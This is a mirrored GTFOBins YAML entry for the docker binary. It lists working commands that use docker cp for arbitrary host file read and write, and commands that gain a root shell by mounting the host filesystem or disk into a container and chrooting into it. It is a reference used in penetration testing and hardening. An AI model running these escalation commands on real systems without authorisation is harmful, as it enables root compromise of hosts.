mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced 2026-03-07 14:36:23 +01:00
46 lines
1.3 KiB
Plaintext
---
comment: |-
  This requires the user to be privileged enough to run `docker`, e.g., being in the `docker` group or being `root`.
functions:
  file-read:
    - code: |-
        docker cp /path/to/input-file $CONTAINER_ID:input-file
        docker cp $CONTAINER_ID:input-file /path/to/temp-file
        cat /path/to/temp-file
      comment: |-
        Read a file by copying it to a temporary container (`$CONTAINER_ID`) and back to a new location on the host.
      contexts:
        sudo:
        suid:
        unprivileged:
  file-write:
    - code: |-
        echo DATA >/path/to/temp-file
        docker cp /path/to/temp-file $CONTAINER_ID:temp-file
        docker cp $CONTAINER_ID:temp-file /path/to/output-file
      comment: |-
        Write a file by copying it to a temporary container (`$CONTAINER_ID`) and back to the target destination on the host.
      contexts:
        sudo:
        suid:
        unprivileged:
  shell:
    - code: |-
        docker run -v /:/mnt --rm -it alpine chroot /mnt /bin/sh
      contexts:
        sudo:
        suid:
        unprivileged:
    - code: |-
        docker run --rm -it --privileged -u root alpine
        mount /dev/sda1 /mnt/
        ls -la /mnt/
        chroot /mnt /bin/bash
      comment: |-
        This exploits the fact that the container is run with the `--privileged` option to directly mount a host's disk, e.g., `/dev/sda1`.
      contexts:
        sudo:
        suid:
        unprivileged:
...